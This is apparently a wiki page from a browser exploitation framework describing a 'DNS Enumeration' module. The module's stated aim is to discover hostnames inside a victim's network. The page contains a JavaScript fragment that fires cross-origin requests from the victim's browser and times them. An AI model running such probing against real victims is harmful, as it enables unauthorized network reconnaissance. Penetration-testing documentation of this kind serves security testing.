-
Notifications
You must be signed in to change notification settings - Fork 2.2k
Module: DNS Enumeration
Haoxi Tan edited this page Jan 9, 2020
·
2 revisions
-
Objective: Discover DNS hostnames within the victim's network
-
Authors: jgaliana
-
Browsers: Firefox, Chrome
function do_resolv(url) {
// Cross Origin Resource Sharing call
var xhr = new XMLHttpRequest();
if("withCredentials" in xhr) {
xhr.open("GET", url, true);
} else if(typeof XDomainRequest != "undefined") {
xhr = new XDomainRequest();
xhr.open("GET",url);
} else {
return -1;
}
xhr.onreadystatechange= function(e) { if(xhr.readyState==4) { clearTimeout(p); check_next(); } };
xhr.send();
var p = setTimeout(function() { xhr.onreadystatechange = function(evt) {}; notify(); }, timeout);
}
- Configuration
- Interface
- Information Gathering
- Social Engineering
- Network Discovery
- Metasploit
- Tunneling
- XSS Rays
- Persistence
- Creating a Module
- Geolocation
- Using-BeEF-With-NGROK